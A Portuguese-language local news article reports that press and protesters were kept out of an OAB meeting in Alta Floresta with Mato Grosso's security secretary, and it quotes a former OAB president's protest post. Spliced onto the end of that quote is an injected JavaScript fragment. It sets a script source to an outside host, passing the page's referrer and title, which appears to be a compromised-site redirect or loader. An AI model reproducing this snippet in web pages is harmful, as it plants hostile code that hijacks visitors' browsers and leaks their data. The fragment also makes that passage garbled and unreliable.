Últimas Notícias

Imprensa reclama de dificuldade de acesso e ex-presidente da OAB ataca entidade

Imprensa reclama de dificuldade de acesso e exDionéia Martins

Durante o evento na sede da OAB de Alta Floresta com o secretário de Segurança Pública, Rogers Jarbas, secretário de Estado de Justiça e Direitos Humanos, Márcio Dorilêo, representantes do Judiciário, Legislativo, Ministério Público, e sociedade civil organizada, manifestantes não tiveram acesso e a imprensa teve dificuldades para fazer a cobertura do evento.

A imprensa que tem um papel importante de levar a informação para aqueles não puderam se fazer presente e até mesmo para aqueles que foram impedidos de participar, também teve dificuldades para ter acesso ao local, a OAB alegava que o auditório já estava cheio, com isso a imprensa tinha que ficar “mendigando” para poder entrar no local.

O auditório da OAB que possui 107 assentos estava lotado, a reunião com as portas fechadas durou em torno de 3 horas, do lado de fora centenas de manifestantes não puderam entrar o que causou revolta. Um pecuarista que estava dentro do auditório levantou e quis registrar que do lado de fora muitas pessoas gostariam de estar participando mas foram impedidos.

O presidente da 8ª subseção da OAB Celso Reis, foi infeliz ao dizer que a porta estava fechada porque a reunião era somente para convidados o que gerou revoltado no deputado estadual, Ondanir Bortolini (Nininho), que estava no plenário. O deputado se levantou e foi embora alegando não ter sido convidado, momento que gerou tumulto e bate boca.

Por meio das redes sociais em sua página pessoal, o ex-presidente da OAB de Alta Floresta, Kleber Coutinho, publicou um post dizendo que não dava pra acreditar, já que a OAB é a casa da democracia. A publicação do advogado recebeu muitas mensagens de apoio.

Confira abaixo a nota na integra:

Não dá para acreditar que a reunião com o Secretário de Segurança Pública do Estado de Mato Grosso está sendo realizada na sede da OAB/AF às portas fechadas e com restrições de acesso ao público.

É um verdadeiro absurdo pois a OAB que é a Casa da Democracia, a Defensora das Liberdades Democráticas, a Porta Voz da Cidadania, e esta atitude é avessa à sua própria história.

A OAB deve se pautar de acordo com a máxima atribuída a Voltaire: “Posso não concordar com o que você diz, mas defenderei até a morte o seu direito de dizê-lo”, e, neste momento ser a intermediadora da sociedade, garantindo ao cidadão o direito de expressar o seu descontentamento, expor os seus anseios e fazer suas cobranças.

Estou indignado pois esta postura está na contra-mão de tudo que acredito da Ordem. Quero deixar claro que NÃO ME REPRESENTA.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top